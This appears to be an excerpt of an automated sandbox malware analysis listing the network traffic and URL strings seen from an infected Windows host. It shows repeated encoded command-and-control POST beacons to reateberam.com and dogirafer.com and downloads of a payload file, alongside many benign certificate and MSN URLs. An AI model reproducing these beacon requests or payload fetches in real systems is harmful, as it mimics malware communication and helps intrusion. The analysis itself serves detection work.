Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 9_2_0137900C InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

9_2_0137900C

Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com

Source: global traffic	DNS traffic detected: DNS query: huanvn.com
Source: global traffic	DNS traffic detected: DNS query: reateberam.com
Source: global traffic	DNS traffic detected: DNS query: dogirafer.com

Source: unknown

HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache

Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000009.00000003.3114928879.00000000079D3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabH
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000009.00000002.4132205195.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4129592451.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2053182664.0000000008720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: explorer.exe, 00000009.00000000.2052116683.00000000079B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000009.00000000.2056295568.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000009.00000000.2051282455.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618653369.000000000371D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4125057147.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4126668023.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462615856.000000000371D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3115088223.000000000371C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000000.2053703533.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2053703533.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
